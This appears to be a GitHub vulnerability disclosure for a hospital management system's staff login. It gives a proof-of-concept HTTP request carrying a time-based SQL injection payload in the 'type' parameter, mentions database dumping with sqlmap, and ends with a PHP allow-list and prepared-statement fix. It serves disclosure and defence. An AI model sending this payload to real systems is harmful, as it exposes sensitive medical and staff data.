I found a SQL injection vulnerability in your hospital management system.
Page Request:-

POST /hospital/hms-staff.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
Connection: close

email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-

The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr() method or using the SQLMAP tool.
Affected URL: http://127.0.0.1/hms-staff.php
Affected Parameter: type
Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-
Mitigation:
Performing Whitelist Input Validation
Use of Prepared Statements (with Parameterized Queries)
aniketpr changed the title from "Vulnerability/BUG - SQL Injection on hms-staff.php page" to "Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page" on Jun 6, 2022
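The two mitigations listed in the report, combined in one login check. This is an added example, not code from the project or from the reporter. It assumes, from the shape of the payload, that `type` is copied into the query where a table name goes. The role names, table and column names, the `authenticate()` helper and the in-memory SQLite database are hypothetical and constructed so the script runs offline.

```php
<?php
// Added example: schema, role names and helper are assumptions, not the project's code.
declare(strict_types=1);

// Allow-list: each accepted "type" value maps to a fixed table identifier.
const ROLE_TABLES = ['admin' => 'admin', 'doctor' => 'doctor', 'nurse' => 'nurse'];

function authenticate(PDO $db, string $email, string $password, string $type): bool
{
    // Identifiers cannot be bound as parameters, so the request value is only
    // used as a lookup key. Anything outside the allow-list stops here.
    $table = ROLE_TABLES[$type] ?? null;
    if ($table === null) {
        return false;
    }

    // Values are bound, never concatenated into the SQL text.
    $stmt = $db->prepare("SELECT password_hash FROM {$table} WHERE email = :email");
    $stmt->execute([':email' => $email]);
    $hash = $stmt->fetchColumn();

    return is_string($hash) && password_verify($password, $hash);
}

// Constructed demo database (SQLite in memory so the script runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
foreach (ROLE_TABLES as $t) {
    $db->exec("CREATE TABLE {$t} (email TEXT PRIMARY KEY, password_hash TEXT NOT NULL)");
}
$ins = $db->prepare('INSERT INTO admin (email, password_hash) VALUES (:e, :h)');
$ins->execute([':e' => 'admin@example.test',
               ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);

// Constructed inputs: a valid login, the "type" value from the report, a quote in "email".
$cases = [
    ['admin@example.test', 'correct horse', 'admin'],
    ['admin@example.test', 'correct horse', 'admin WHERE 1=1 AND SLEEP(10)-- -'],
    ["' OR '1'='1", 'x', 'admin'],
];
foreach ($cases as [$e, $p, $t]) {
    printf("%-36s => %s\n", $t, authenticate($db, $e, $p, $t) ? 'accepted' : 'rejected');
}
```

With a MySQL backend the same PDO calls apply; setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the driver use server-side prepared statements.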